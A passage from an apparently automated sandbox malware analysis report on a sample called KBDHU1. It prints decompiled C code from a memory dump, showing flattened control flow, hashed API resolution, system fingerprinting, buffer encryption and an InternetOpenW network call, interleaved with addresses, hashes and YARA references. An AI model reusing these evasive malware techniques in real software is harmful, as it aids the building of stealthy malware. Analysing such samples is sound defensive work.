										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x234e1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E02343F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E02343E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x234e1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x234dc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E02343F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E02343E80(_t112, _t108, 0x560d239b, _t145);
							 *0x234dc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x02348240
0x02348240
0x02348246
0x0234824e
0x0234825d
0x02348262
0x02348266
0x0234826e
0x02348276
0x0234827e
0x02348290
0x02348294
0x0234829c
0x023482a4
0x023482ae
0x023482b7
0x023482bc
0x023482c4
0x023482cc
0x023482d1
0x023482d9
0x023482e1
0x023482e9
0x023482f1
0x023482f7
0x02348309
0x0234830d
0x02348315
0x02348323
0x02348326
0x0234832a
0x02348332
0x02348332
0x02348332
0x02348338
0x00000000
0x00000000
0x0234833e
0x023483fc
0x02348401
0x02348403
0x0234840a
0x0234840f
0x02348416
0x0234841b
0x0234841b
0x02348425
0x02348427
0x00000000
0x02348344
0x0234834a
0x023483c0
0x023483c5
0x023483c7
0x023483ce
0x023483d3
0x023483da
0x023483df
0x023483df
0x023483f0
0x023483f2
0x00000000
0x0234834c
0x02348352
0x023484cf
0x023484d7
0x023484f7
0x023484fb
0x02348503
0x02348507
0x0234850b
0x02348513
0x02348515
0x00000000
0x02348517
0x02348517
0x0234851e
0x0234852a
0x02348519
0x02348519
0x0234851b
0x00000000
0x00000000
0x00000000
0x00000000
0x0234851b
0x02348517
0x02348358
0x0234835e
0x023484ac
0x023484ac
0x023484b2
0x00000000
0x00000000
0x00000000
0x00000000
0x02348364
0x0234836c
0x02348373
0x02348378
0x02348386
0x02348386
0x023483a9
0x023483ab
0x023483b0
0x023484b8
0x023484b8
0x023484c2
0x023483b6
0x023483b6
0x00000000
0x023483b6
0x023483b0
0x0234835e
0x02348352
0x0234834a
0x00000000
0x0234833e
0x02348431
0x02348437
0x023484c3
0x00000000
0x0234843d
0x0234843d
0x02348443
0x02348445
0x0234844a
0x0234844c
0x02348453
0x02348458
0x0234845f
0x02348464
0x02348464
0x02348473
0x02348477
0x02348479
0x02348484
0x0234848a
0x0234848c
0x02348493
0x02348498
0x0234849f
0x023484a4
0x023484a4
0x023484aa
0x023484aa
0x00000000
0x02348443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 023483A9

Strings

J, xrefs: 023482D9

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: ccd410683144f24618fd80977ab7a067e3778e8b4e94b48caeb13775e285a7ce
Instruction ID: 687f0c6988785e9dee0df9814396bce694fdc71dde93fe7aa5cc19edd1cc7aca
Opcode Fuzzy Hash: ccd410683144f24618fd80977ab7a067e3778e8b4e94b48caeb13775e285a7ce
Instruction Fuzzy Hash: 0961CF72A093019BC718DF68D884A2FB7E5BBC4758F048D9DF4959B280DB74E9098F92

Uniqueness

Uniqueness Score: -1.00%

Function 02345360, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E02345360(void* __ebx, void* __ebp) {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				void* _t8;
				intOrPtr* _t16;
				intOrPtr* _t19;
				void* _t22;
				void* _t31;
				void* _t32;
				void* _t35;

				_t32 = __ebp;
				_t22 = __ebx;
				_t8 = 0x26a841ee;
				_t31 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t35 = _t8 - 0x1fae9e92;
						if(_t35 > 0) {
							break;
						}
						if(_t35 == 0) {
							_t31 = _t31 + _v280 * 0x3e8;
							_t8 = 0x2e629178;
							continue;
						} else {
							if(_t8 == 0x41b9e46) {
								return (_v320 & 0x0000ffff) + _t31;
							} else {
								if(_t8 == 0xb2cdcb1) {
									_t16 =  *0x234db30;
									if(_t16 == 0) {
										_t16 = E02343E80(_t22, E02343F20(0xbb398380), 0xa4407471, _t32);
										 *0x234db30 = _t16;
									}
									 *_t16( &_v320); // executed
									_t8 = 0x22049820;
									continue;
								} else {
									if(_t8 != 0x142f3962) {
										goto L17;
									} else {
										_t19 =  *0x234dedc;
										_v284 = 0x11c;
										if(_t19 == 0) {
											_t19 = E02343E80(_t22, E02343F20(0xe66945e6), 0x69e48357, _t32);
											 *0x234dedc = _t19;
										}
										 *_t19( &_v284);
										_t8 = 0xb2cdcb1;
										continue;
									}
								}
							}
						}
						L22:
					}
					if(_t8 == 0x22049820) {
						_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
						_t8 = 0x1fae9e92;
						goto L1;
					} else {
						if(_t8 == 0x26a841ee) {
							_t8 = 0x142f3962;
							goto L1;
						} else {
							if(_t8 != 0x2e629178) {
								goto L17;
							} else {
								_t31 = _t31 + _v276 * 0x64;
								_t8 = 0x41b9e46;
								goto L1;
							}
						}
					}
					goto L22;
					L17:
				} while (_t8 != 0x135ed498);
				return _t31;
				goto L22;
			}

0x02345360
0x02345360
0x02345366
0x0234536c
0x0234536c
0x02345370
0x02345370
0x02345370
0x02345370
0x02345375
0x00000000
0x00000000
0x0234537b
0x02345415
0x02345417
0x00000000
0x02345381
0x02345386
0x0234548e
0x0234538c
0x02345391
0x023453d8
0x023453df
0x023453f2
0x023453f7
0x023453f7
0x02345401
0x02345403
0x00000000
0x02345393
0x02345398
0x00000000
0x0234539e
0x0234539e
0x023453a3
0x023453ad
0x023453c0
0x023453c5
0x023453c5
0x023453cf
0x023453d1
0x00000000
0x023453d1
0x02345398
0x02345391
0x02345386
0x00000000
0x0234537b
0x02345426
0x02345474
0x02345476
0x00000000
0x02345428
0x0234542d
0x0234545c
0x00000000
0x0234542f
0x02345434
0x00000000
0x02345436
0x0234543b
0x0234543d
0x00000000
0x0234543d
0x02345434
0x0234542d
0x00000000
0x02345447
0x02345447
0x0234545b
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 02345401

Strings

Ei, xrefs: 023453AF

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: Ei
API String ID: 1721193555-3988083245
Opcode ID: 62e7b7d97aaef6d15ec99d11c341f174f5b2a81eda7c3360edc2faa0fa657174
Instruction ID: b20bafb043af79bf74e80cdcc29719b7db53453cce6aa0e9f7c8cf451f247826
Opcode Fuzzy Hash: 62e7b7d97aaef6d15ec99d11c341f174f5b2a81eda7c3360edc2faa0fa657174
Instruction Fuzzy Hash: 81212566F0431087CA248BA884C43BFB1D597A478CFD44AEAE44ADB350DF64F9408FC2

Uniqueness

Uniqueness Score: -1.00%

Function 02342290, Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02342290(signed int* __ecx, signed int* __edx) {
				char _v25;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				signed int* _v132;
				signed int* _v136;
				signed int* _v140;
				signed int* _v144;
				signed int* _v148;
				signed int* _v152;
				signed int* _v156;
				signed int* _v160;
				signed int* _v164;
				void* __ebx;
				void* __ebp;
				signed int* _t61;
				intOrPtr _t63;
				signed int _t69;
				intOrPtr _t72;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t92;
				signed int _t93;
				signed int _t98;
				signed int _t104;
				signed int _t106;
				signed int _t111;
				signed int* _t112;
				signed int _t113;
				signed int _t117;
				intOrPtr* _t120;
				signed int* _t139;
				signed int _t142;
				signed int _t147;
				void* _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t152;
				signed int _t155;
				signed int** _t157;
				void* _t159;
				void* _t160;

				_t157 =  &_v140;
				_t104 = _v120;
				_t155 = _v120;
				_v132 = __edx;
				_t150 = 0x3b18423d;
				_v136 = __ecx;
				_v128 = 0;
				while(1) {
					L1:
					_t61 = _v140;
					do {
						while(1) {
							L2:
							_t159 = _t150 - 0x1c8b703e;
							if(_t159 > 0) {
								break;
							}
							if(_t159 == 0) {
								_t106 =  *0x234def8;
								__eflags = _t106;
								if(_t106 == 0) {
									_t106 = E02343E80(_t104, E02343F20(0x667fdee), 0xb11f83b0, _t155);
									 *0x234def8 = _t106;
								}
								_t63 =  *0x234e2e4; // 0x78f028
								_t26 = _t63 + 0x18; // 0x78fdd0
								 *_t106( *_t26, 0, 0,  &_v124);
								asm("sbb esi, esi");
								_t150 = (_t150 & 0x258fd75b) + 0x8cf6762;
								while(1) {
									L1:
									_t61 = _v140;
									goto L2;
								}
							} else {
								_t160 = _t150 - 0x13859baf;
								if(_t160 > 0) {
									__eflags = _t150 - 0x14926a00;
									if(_t150 != 0x14926a00) {
										goto L8;
									} else {
										_t69 =  *0x234e168;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E02343E80(_t104, E02343F20(0x667fdee), 0xae646c41, _t155);
											 *0x234e168 = _t69;
										}
										 *_t69(_v124);
										_t150 = 0x8cf6762;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									if(_t160 == 0) {
										_t111 =  *0x234de98;
										__eflags = _t111;
										if(_t111 == 0) {
											_t111 = E02343E80(_t104, E02343F20(0x667fdee), 0xe5edfdec, _t155);
											_t61 = _v140;
											 *0x234de98 = _t111;
										}
										_t72 =  *0x234e2e4; // 0x78f028
										_t19 = _t72 + 0x20; // 0x78fc90
										 *_t111( *_t19, _v124, 1, 0, _t61,  &_v120, _t155);
										_t112 = _v164;
										_t139 = _v160;
										asm("sbb esi, esi");
										_t150 = (_t150 & 0x0b40c3ab) + 0x14926a00;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									} else {
										if(_t150 == 0x3028e43) {
											_t113 =  *0x234e060;
											_v112 = 0x14;
											__eflags = _t113;
											if(_t113 == 0) {
												_t113 = E02343E80(_t104, E02343F20(0x667fdee), 0xe39c7ccc, _t155);
												 *0x234e060 = _t113;
											}
											_t79 =  *_t113(_v124, 2, _t104 + 0x60,  &_v112, 0);
											_t112 = _v156;
											__eflags = _t79;
											_t61 = _v160;
											_t139 = _v152;
											if(_t79 != 0) {
												_t150 = 0x14926a00;
												_v148 = 1;
												while(1) {
													L1:
													_t61 = _v140;
													goto L2;
												}
											}
											continue;
										} else {
											if(_t150 == 0x8cf6762) {
												_t147 = _v128;
												__eflags = _t147;
												if(_t147 == 0) {
													E02344250(_t104,  *_t139);
												}
												return _t147;
											} else {
												goto L8;
											}
										}
									}
								}
							}
							L51:
						}
						__eflags = _t150 - 0x2f4b92a8;
						if(__eflags > 0) {
							__eflags = _t150 - 0x3b18423d;
							if(_t150 != 0x3b18423d) {
								goto L8;
							} else {
								_t150 = 0x2f4b92a8;
								goto L2;
							}
						} else {
							if(__eflags == 0) {
								_t85 = _t112[1] + 1;
								__eflags = _t85 & 0x0000000f;
								if((_t85 & 0x0000000f) != 0) {
									_t85 = (_t85 & 0xfffffff0) + 0x10;
									__eflags = _t85;
								}
								_t151 = _t85 + 0x74;
								_t86 =  *0x234dea8;
								_t139[1] = _t151;
								__eflags = _t86;
								if(_t86 == 0) {
									_t86 = E02343E80(_t104, E02343F20(0xbb398380), 0x97f883e, _t155);
									 *0x234dea8 = _t86;
								}
								_t148 =  *_t86();
								_t88 =  *0x234dcec;
								__eflags = _t88;
								if(_t88 == 0) {
									_t88 = E02343E80(_t104, E02343F20(0xbb398380), 0xe9233692, _t155);
									 *0x234dcec = _t88;
								}
								_t89 =  *_t88(_t148, 8, _t151);
								_t139 = _v144;
								_t104 = _t89;
								 *_t139 = _t104;
								__eflags = _t104;
								if(_t104 == 0) {
									break;
								} else {
									_t53 = _t104 + 0x74; // 0x74
									_t61 = _t53;
									_t150 = 0x1c8b703e;
									_v152 = _t61;
									_t155 =  &_v116;
									_v132 = _v148[1];
									_t112 = _v148;
									goto L2;
								}
							} else {
								__eflags = _t150 - 0x1fd32dab;
								if(_t150 == 0x1fd32dab) {
									_t117 =  *0x234e0f8;
									_v116 = 0x6c;
									__eflags = _t117;
									if(_t117 == 0) {
										_t117 = E02343E80(_t104, E02343F20(0x667fdee), 0xd10d6746, _t155);
										 *0x234e0f8 = _t117;
									}
									_t92 =  *0x234e2e4; // 0x78f028
									_t36 = _t92 + 0x1c; // 0x790110
									_t37 = _t92 + 0x20; // 0x78fc90, executed
									_t93 =  *_t117( *_t37,  *_t36, 1, 0x40,  &_v108,  &_v116); // executed
									__eflags = _t93;
									if(_t93 == 0) {
										_t112 = _v160;
										_t150 = 0x14926a00;
										_t139 = _v156;
										goto L1;
									} else {
										_t120 =  &_v25;
										_t142 = _t104;
										do {
											_t142 = _t142 + 1;
											 *((char*)(_t142 - 1)) =  *_t120;
											_t120 = _t120 - 1;
											__eflags = _t120 -  &_v120;
										} while (_t120 >=  &_v120);
										_t112 = _v160;
										_t150 = 0x3028e43;
										_t139 = _v156;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								} else {
									__eflags = _t150 - 0x2e5f3ebd;
									if(_t150 != 0x2e5f3ebd) {
										goto L8;
									} else {
										_t98 =  *0x234daac;
										_t152 = _t112[1];
										_t149 =  *_t112;
										__eflags = _t98;
										if(_t98 == 0) {
											_t98 = E02343E80(_t104, E02343F20(0xe66945e6), 0x70f7b8ec, _t155);
											 *0x234daac = _t98;
										}
										 *_t98(_v140, _t149, _t152);
										_t112 = _v136;
										_t157 =  &(_t157[3]);
										_t139 = _v132;
										_t150 = 0x13859baf;
										while(1) {
											L1:
											_t61 = _v140;
											goto L2;
										}
									}
								}
							}
						}
						goto L51;
						L8:
					} while (_t150 != 0xd360827);
					return _v128;
					goto L51;
				}
			}

0x02342290
0x02342297
0x0234229e
0x023422a4
0x023422a8
0x023422ad
0x023422b1
0x023422b5
0x023422b5
0x023422b5
0x023422c0
0x023422c0
0x023422c0
0x023422c0
0x023422c6
0x00000000
0x00000000
0x023422cc
0x02342422
0x02342428
0x0234242a
0x02342442
0x02342444
0x02342444
0x0234244f
0x02342458
0x0234245b
0x02342467
0x0234246f
0x023422b5
0x023422b5
0x023422b5
0x00000000
0x023422b5
0x023422d2
0x023422d2
0x023422d8
0x023423da
0x023423e0
0x00000000
0x023423e6
0x023423e6
0x023423eb
0x023423ed
0x02342400
0x02342405
0x02342405
0x0234240e
0x02342414
0x023422b5
0x023422b5
0x023422b5
0x00000000
0x023422b5
0x023422b5
0x023422de
0x023422de
0x02342378
0x0234237e
0x02342380
0x02342398
0x0234239a
0x0234239e
0x0234239e
0x023423ab
0x023423b8
0x023423bb
0x023423bd
0x023423c3
0x023423c7
0x023423cf
0x023422b5
0x023422b5
0x023422b5
0x00000000
0x023422b5
0x023422e4
0x023422ea
0x0234230f
0x02342315
0x0234231d
0x0234231f
0x02342337
0x02342339
0x02342339
0x02342350
0x02342352
0x02342356
0x02342358
0x0234235c
0x02342360
0x02342366
0x0234236b
0x023422b5
0x023422b5
0x023422b5
0x00000000
0x023422b5
0x023422b5
0x00000000
0x023422ec
0x023422f2
0x02342627
0x0234262b
0x0234262d
0x02342631
0x02342631
0x02342642
0x00000000
0x00000000
0x00000000
0x023422f2
0x023422ea
0x023422de
0x023422d8
0x00000000
0x023422cc
0x0234247a
0x02342480
0x02342611
0x02342617
0x00000000
0x0234261d
0x0234261d
0x00000000
0x0234261d
0x02342486
0x02342486
0x02342578
0x02342579
0x0234257b
0x02342580
0x02342580
0x02342580
0x02342583
0x02342586
0x0234258b
0x0234258e
0x02342590
0x023425a3
0x023425a8
0x023425a8
0x023425af
0x023425b1
0x023425b6
0x023425b8
0x023425cb
0x023425d0
0x023425d0
0x023425d9
0x023425db
0x023425df
0x023425e1
0x023425e3
0x023425e5
0x00000000
0x023425eb
0x023425ef
0x023425ef
0x023425f5
0x023425fa
0x023425fe
0x02342604
0x02342608
0x00000000
0x02342608
0x0234248c
0x0234248c
0x02342492
0x023424e6
0x023424ec
0x023424f4
0x023424f6
0x0234250e
0x02342510
0x02342510
0x02342520
0x02342529
0x0234252c
0x0234252f
0x02342531
0x02342533
0x02342563
0x02342567
0x0234256c
0x00000000
0x02342535
0x02342535
0x0234253c
0x02342540
0x02342542
0x02342545
0x02342548
0x0234254d
0x0234254d
0x02342551
0x02342555
0x0234255a
0x023422b5
0x023422b5
0x023422b5
0x00000000
0x023422b5
0x023422b5
0x02342494
0x02342494
0x0234249a
0x00000000
0x023424a0
0x023424a0
0x023424a5
0x023424a8
0x023424aa
0x023424ac
0x023424bf
0x023424c4
0x023424c4
0x023424cf
0x023424d1
0x023424d5
0x023424d8
0x023424dc
0x023422b5
0x023422b5
0x023422b5
0x00000000
0x023422b5
0x023422b5
0x0234249a
0x02342492
0x02342486
0x00000000
0x023422f8
0x023422f8
0x0234230e
0x00000000
0x0234230e

Strings

l, xrefs: 023424EC
Ei, xrefs: 023424AE

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID:
String ID: l$Ei
API String ID: 0-2145112675
Opcode ID: 200a967df678a2936d732be803f28c73b6f0c27424d44070fbebc049e39f6e8c
Instruction ID: 66ffc2e609c1198cb0eb0de6fc0b01b4bcf66f10cd3bd8a21d28ab755268f898
Opcode Fuzzy Hash: 200a967df678a2936d732be803f28c73b6f0c27424d44070fbebc049e39f6e8c
Instruction Fuzzy Hash: F591B076A043029BCB18DE24D490B6BB7E6AB88704F1549EDFC59AB351DF30FC458B92

Uniqueness

Uniqueness Score: -1.00%

Function 02341950, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 230
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E02341950(intOrPtr* __ecx, void* __edx, void** _a4) {
				char _v68;
				char _v72;
				intOrPtr* _v132;
				char _v136;
				void* _v140;
				char _v144;
				intOrPtr _v148;
				intOrPtr* _v152;
				void* __ebx;
				void* __ebp;
				void* _t33;
				intOrPtr* _t34;
				signed int _t35;
				intOrPtr* _t38;
				signed int _t39;
				void* _t42;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t59;
				intOrPtr* _t64;
				void* _t67;
				intOrPtr* _t71;
				char _t72;
				intOrPtr* _t75;
				void** _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr* _t83;
				intOrPtr* _t89;
				void* _t125;
				long _t126;
				void* _t131;
				void* _t132;
				void* _t133;
				intOrPtr _t134;
				void* _t135;
				void** _t138;
				void** _t139;
				void** _t140;
				void* _t142;

				_t83 = __ecx;
				_t138 =  &_v140;
				_v140 = __edx;
				_t33 = 0x28f1768;
				_t135 = _v140;
				_t125 = _v140;
				_v132 = __ecx;
				while(1) {
					L1:
					_t80 = _a4;
					do {
						while(1) {
							L2:
							_t142 = _t33 - 0xf6dd6c0;
							if(_t142 > 0) {
								break;
							}
							if(_t142 == 0) {
								_t80[1] =  *((intOrPtr*)(_t83 + 4)) + 0x1000;
								_t33 = 0x5a08c3;
								continue;
							} else {
								if(_t33 == 0x5a08c3) {
									_t64 =  *0x234dea8;
									_t126 = _t80[1];
									if(_t64 == 0) {
										_t64 = E02343E80(_t80, E02343F20(0xbb398380), 0x97f883e, _t135);
										 *0x234dea8 = _t64;
									}
									_t132 =  *_t64();
									if( *0x234dcec == 0) {
										 *0x234dcec = E02343E80(_t80, E02343F20(0xbb398380), 0xe9233692, _t135);
									}
									_t67 = RtlAllocateHeap(_t132, 8, _t126); // executed
									_t125 = _t67;
									 *_t80 = _t125;
									if(_t125 == 0) {
										goto L8;
									} else {
										_t33 = 0x11ecd0fb;
										_t83 = _v140;
										_t135 = _t125 + _t80[1];
										continue;
									}
								} else {
									if(_t33 == 0x28f1768) {
										_t71 =  *0x234dd4c;
										if(_t71 == 0) {
											_t71 = E02343E80(_t80, E02343F20(0xbb398380), 0xae3c1a47, _t135);
											 *0x234dd4c = _t71;
										}
										_t72 =  *_t71();
										_t83 = _v132;
										_v136 = _t72;
										_t33 = 0xf6dd6c0;
										continue;
									} else {
										if(_t33 == 0x3c584d9) {
											_t133 = E023435C0(0x234d0b0);
											_t75 =  *0x234df98;
											if(_t75 == 0) {
												_t75 = E02343E80(_t80, E02343F20(0xe66945e6), 0x91c072c8, _t135);
												 *0x234df98 = _t75;
											}
											 *_t75(_t125, _t135 - _t125, _t133, _v140);
											E02343460(_t133);
											return 1;
										} else {
											goto L7;
										}
									}
								}
							}
							L38:
						}
						if(_t33 == 0x11ecd0fb) {
							_t34 =  *0x234df48;
							if(_t34 == 0) {
								_t34 = E02343E80(_t80, E02343F20(0xe66945e6), 0x5790059b, _t135);
								 *0x234df48 = _t34;
							}
							_t35 =  *_t34( &_v136);
							_t19 = (_t35 & 0x0000000f) + 4; // 0x4
							E02344E60( &_v68, _t19,  &_v140);
							_t38 =  *0x234df48;
							_t139 =  &(_t138[1]);
							 *((char*)(_t139 + (_t35 & 0x0000000f) + 0x60)) = 0;
							if(_t38 == 0) {
								_t38 = E02343E80(_t80, E02343F20(0xe66945e6), 0x5790059b, _t135);
								 *0x234df48 = _t38;
							}
							_t39 =  *_t38( &_v140);
							_t25 = (_t39 & 0x0000000f) + 4; // 0x4
							E02344E60( &_v136, _t25,  &_v144);
							_t140 =  &(_t139[1]);
							 *((char*)(_t140 + (_t39 & 0x0000000f) + 0x20)) = 0;
							_t42 = E023435C0(0x234d000);
							_t89 =  *0x234df98;
							_t81 = _t42;
							if(_t89 == 0) {
								_t89 = E02343E80(_t81, E02343F20(0xe66945e6), 0x91c072c8, _t135);
								 *0x234df98 = _t89;
							}
							_t125 = _t125 +  *_t89(_t125, _t135 - _t125, _t81, _v148,  &_v72,  &_v136);
							_t138 =  &(_t140[6]);
							_t48 =  *0x234dea8;
							if(_t48 == 0) {
								_t48 = E02343E80(_t81, E02343F20(0xbb398380), 0x97f883e, _t135);
								 *0x234dea8 = _t48;
							}
							_t131 =  *_t48();
							_t50 =  *0x234e1a0;
							if(_t50 == 0) {
								_t50 = E02343E80(_t81, E02343F20(0xbb398380), 0x26c3f343, _t135);
								 *0x234e1a0 = _t50;
							}
							 *_t50(_t131, 0, _t81);
							_t83 = _v152;
							_t33 = 0x16cf0daa;
							goto L1;
						} else {
							if(_t33 != 0x16cf0daa) {
								goto L7;
							} else {
								_t59 =  *0x234daac;
								_t134 =  *((intOrPtr*)(_t83 + 4));
								_t82 =  *_t83;
								if(_t59 == 0) {
									_t59 = E02343E80(_t82, E02343F20(0xe66945e6), 0x70f7b8ec, _t135);
									 *0x234daac = _t59;
								}
								 *_t59(_t125, _t82, _t134);
								_t83 = _v132;
								_t138 =  &(_t138[3]);
								_t33 = 0x3c584d9;
								_t125 = _t125 +  *((intOrPtr*)(_t83 + 4));
								while(1) {
									L1:
									_t80 = _a4;
									goto L2;
								}
							}
						}
						goto L38;
						L7:
					} while (_t33 != 0x1b4ffcf8);
					L8:
					return 0;
					goto L38;
				}
			}

0x02341950
0x02341950
0x02341959
0x0234195d
0x02341962
0x02341967
0x0234196b
0x0234196f
0x0234196f
0x0234196f
0x02341980
0x02341980
0x02341980
0x02341980
0x02341985
0x00000000
0x00000000
0x0234198b
0x02341a6f
0x02341a72
0x00000000
0x02341991
0x02341996
0x023419f3
0x023419f8
0x023419fd
0x02341a10
0x02341a15
0x02341a15
0x02341a1c
0x02341a25
0x02341a3d
0x02341a3d
0x02341a46
0x02341a48
0x02341a4a
0x02341a4e
0x00000000
0x02341a54
0x02341a57
0x02341a5c
0x02341a60
0x00000000
0x02341a60
0x02341998
0x0234199d
0x023419be
0x023419c5
0x023419d8
0x023419dd
0x023419dd
0x023419e2
0x023419e4
0x023419e8
0x023419ec
0x00000000
0x0234199f
0x023419a4
0x02341c1c
0x02341c1e
0x02341c25
0x02341c38
0x02341c3d
0x02341c3d
0x02341c4b
0x02341c52
0x02341c66
0x00000000
0x00000000
0x00000000
0x023419a4
0x0234199d
0x02341996
0x00000000
0x0234198b
0x02341a81
0x02341ad0
0x02341ad7
0x02341aea
0x02341aef
0x02341aef
0x02341af9
0x02341b09
0x02341b0c
0x02341b11
0x02341b16
0x02341b19
0x02341b20
0x02341b33
0x02341b38
0x02341b38
0x02341b42
0x02341b52
0x02341b55
0x02341b5a
0x02341b5d
0x02341b67
0x02341b6c
0x02341b72
0x02341b76
0x02341b8e
0x02341b90
0x02341b90
0x02341bad
0x02341baf
0x02341bb2
0x02341bb9
0x02341bcc
0x02341bd1
0x02341bd1
0x02341bd8
0x02341bda
0x02341be1
0x02341bf4
0x02341bf9
0x02341bf9
0x02341c02
0x02341c04
0x02341c08
0x00000000
0x02341a83
0x02341a88
0x00000000
0x02341a8e
0x02341a8e
0x02341a93
0x02341a96
0x02341a9a
0x02341aad
0x02341ab2
0x02341ab2
0x02341aba
0x02341abc
0x02341ac0
0x02341ac3
0x02341ac8
0x0234196f
0x0234196f
0x0234196f
0x00000000
0x0234196f
0x0234196f
0x02341a88
0x00000000
0x023419aa
0x023419aa
0x023419b4
0x023419bd
0x00000000
0x023419bd

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 02341A46

Strings

Ei, xrefs: 02341A9C
Ei, xrefs: 02341B78
Ei, xrefs: 02341C27
Ei, xrefs: 02341B22
Ei, xrefs: 02341AD9

Memory Dump Source

Source File: 00000005.00000002.906181296.0000000002341000.00000020.00000001.sdmp, Offset: 02340000, based on PE: true

Associated: 00000005.00000002.906176264.0000000002340000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906189186.000000000234D000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.906202274.000000000234F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2340000_KBDHU1.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: Ei$Ei$Ei$Ei$Ei
API String ID: 1279760036-866448414
Opcode ID: d5316ee4cb3301bc15198cf448cc9e6266da31288d57658810d15df28617f38e
Instruction ID: eb8334a8f468d6d648d097ab30c5a4ea771c29a1cf3989587d3a1966c79b7564
Opcode Fuzzy Hash: d5316ee4cb3301bc15198cf448cc9e6266da31288d57658810d15df28617f38e
Instruction Fuzzy Hash: 2D71A175B043059BD724EB68949062B77EAABC0744F5449EDE88ACB340EF35FC418BE2

Uniqueness

Uniqueness Score: -1.00%

Function 02342C20, Relevance: 9.3, APIs: 6, Instructions: 287
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E02342C20(void* __ecx, void* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t47;
				signed int _t51;
				void* _t53;
				void* _t58;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t65;
				void* _t66;
				WCHAR* _t68;
				void* _t84;
				void* _t88;
				void* _t133;
				void* _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				WCHAR* _t141;
				long _t143;
				void* _t147;
				void* _t148;
				void* _t151;
				void* _t152;

				_t147 =  *(_t148 + 0x3c);
				 *(_t148 + 0x30) = __ecx;
				_t137 = 0x21ed7693;
				_t84 =  *(_t148 + 0x30);
				 *(_t148 + 0x30) = __edx;
				 *(_t148 + 0x14) = 0;
				 *(_t148 + 0x24) = 0;
				 *(_t148 + 0x20) = 0;
				 *(_t148 + 0x10) = 0;
				while(1) {
					L1:
					_t133 =  *(_t148 + 0x18);
					while(1) {
						L2:
						_t151 = _t137 - 0xdefb712;
						if(_t151 > 0) {
							goto L36;
						}
						L3:
						if(_t151 == 0) {
							__eflags =  *0x234e12c;
							if( *0x234e12c == 0) {
								 *0x234e12c = E02343E80(_t84, E02343F20(0x2ba535f4), 0xc71f7f57, _t147);
							}
							_t36 = InternetOpenW( *(_t148 + 0x24), 0, 0, 0, 0); // executed
